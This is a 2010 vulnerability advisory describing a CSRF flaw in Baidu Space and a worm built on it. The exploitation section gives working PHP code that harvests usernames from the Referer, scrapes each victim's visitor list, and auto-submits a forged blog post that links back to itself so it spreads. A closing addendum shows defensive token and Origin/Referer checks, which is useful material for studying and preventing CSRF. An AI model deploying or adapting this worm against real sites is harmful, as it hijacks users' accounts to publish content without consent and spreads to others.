Baidu Hi CSRF Bug
Author: menzhi007
Blog: http://hi.baidu.com/menzhi007
Team: http://www.80vul.com
Date: May 13, 2010

1. Analysis

Baidu Space (hi.baidu.com) does not strictly validate the Referer header, and its CSRF token check does not work, so any cross-site page can submit state-changing requests on behalf of a logged-in user. Combined with the "recent visitors" record shown on every user's home page, this can be turned into a CSRF worm.

2. Exploitation

While a Baidu Space user is browsing a page, they are tricked into clicking a hyperlink (or an image, etc.) such as <a href=http://www.l4mp.org/lab/pdf.php>Hi</a>. pdf.php reads the victim's username out of the Referer, requests that user's home page to obtain the most recent entry in the visitor record, and then uses CSRF to submit and publish the same article, so the post propagates as a worm.

Sample code:

```php
<?php
// Take the username of the Baidu Space user who clicked the link from the Referer.
$referer = $_SERVER['HTTP_REFERER'];
preg_match("/http:\/\/hi\.baidu\.com\/([a-z0-9_%]+)\/blog/i", $referer, $sitename);

// Fetch that user's home page and pick the most recent visitor out of the visitor record.
$result = get_data("hi.baidu.com", "/".$sitename[1]);
//preg_match("/\[\"(([a-z0-9_%])+)\"\,\"[a-z0-9_%]+\"\,\"/i",$result,$match_valid);
preg_match("/<a href=\"\/([a-z0-9_%]+)\" target=\"_blank\" class=\"ucard\"/i", $result, $match);

if (!empty($match[1]) && !empty($sitename[1])) {
    // Auto-submitting form: the victim's browser posts it with the victim's own cookies.
    // bdstoken carries an arbitrary value because the server-side token check is ineffective.
    $show = '<body onload="document.form1.submit();">
<form name="form1" id="popFormSubmit" action=" http://hi.baidu.com/'.$match[1].'/commit" method="post" >
<input type="hidden" name="bdstoken" value="menzhi007">
<input type="hidden" name="ct" value="1">
<input type="hidden" name="cm" value="1">
<input type="hidden" name="spBlogID" >
<input type="hidden" name="spBlogCatName" value="默认分类">
<input id="edithid" name="edithid" type="hidden">
<input type="hidden" name="spRefURL" id="spRefURL">
<input type="hidden" name="spBlogTitle" value="Hi menzhi007">
<input type="hidden" name="spBlogText" value="Hi Hero!<br>参考: <a href=http://www.l4mp.org/lab/pdf.php>http://www.l4mp.org/lab/pdf</a>">
<input type="hidden" name="spBlogCatName" value="%C4%AC%C8%CF%B7%D6%C0%E0">
<input type="hidden" name="spIsCmtAllow" value="1">
<input type="hidden" name="spBlogPower" value="0">
<input type="hidden" name="spShareNotAllow" value="0">
<input type="hidden" name="spVcode">
<input type="hidden" name="spVerifyKey">
<input name="tj" type="submit" value=" 发表文章 " >
</form>
</body>';
    echo $show;
} else {
    echo "Hi";
}

// Minimal raw HTTP GET over a plain socket; returns the full response (headers and body).
function get_data($host, $path) {
    $cmd = '';
    $data = "GET ".$path." HTTP/1.1\r\n";
    $data .= "Accept: */*\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Content-Length: ".strlen($cmd)."\r\n";
    $data .= "Connection: Close\r\n\r\n";
    $data .= $cmd;
    $fp = fsockopen($host, 80);
    fputs($fp, $data);
    $resp = '';
    while ($fp && !feof($fp)) $resp .= fread($fp, 1024);
    return $resp;
}
?>
```

3. Patch

Missing.
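The post gives no patch. As an added example (not from the post and not Baidu's code), the following PHP shows the two server-side checks whose absence the analysis describes: a per-session token compared in constant time, and an Origin/Referer check that rejects missing or foreign hosts. The field name bdstoken and the host hi.baidu.com are taken from the page; the session and cookie settings are assumptions.

```php
<?php
// Added example, not the original site's code. Assumes a PHP session (7.3+ for the
// SameSite cookie parameter) and a form field named bdstoken as on the page.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true, 'secure' => true]);
session_start();

const EXPECTED_HOST = 'hi.baidu.com'; // placeholder: the host that serves the form

// One unpredictable token per session, embedded in every state-changing form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Origin/Referer check. A cross-site auto-submitted form arrives with the
// attacker's page as Referer (or a foreign Origin); absent headers are rejected too.
function same_origin(array $server, string $expectedHost): bool {
    $src  = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = parse_url($src, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expectedHost) === 0;
}

// Token check: constant-time comparison against the session value, so a fixed
// attacker-chosen value such as "menzhi007" can never pass.
function csrf_valid(array $post, ?string $sessionToken): bool {
    $submitted = $post['bdstoken'] ?? '';
    return $sessionToken !== null && is_string($submitted)
        && hash_equals($sessionToken, $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!same_origin($_SERVER, EXPECTED_HOST)
        || !csrf_valid($_POST, $_SESSION['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Rejected: cross-site request');
    }
    // Both checks passed: handle the submission (e.g. create the blog entry) here.
}
?>
<form method="post" action="/commit">
  <input type="hidden" name="bdstoken" value="<?= htmlspecialchars(csrf_token()) ?>">
  <input type="text" name="spBlogTitle">
  <input type="submit" value="Post">
</form>
```

With these checks in place the page's auto-submitting form fails on both counts: its Referer is the attacker's host and its bdstoken does not match the victim's session token.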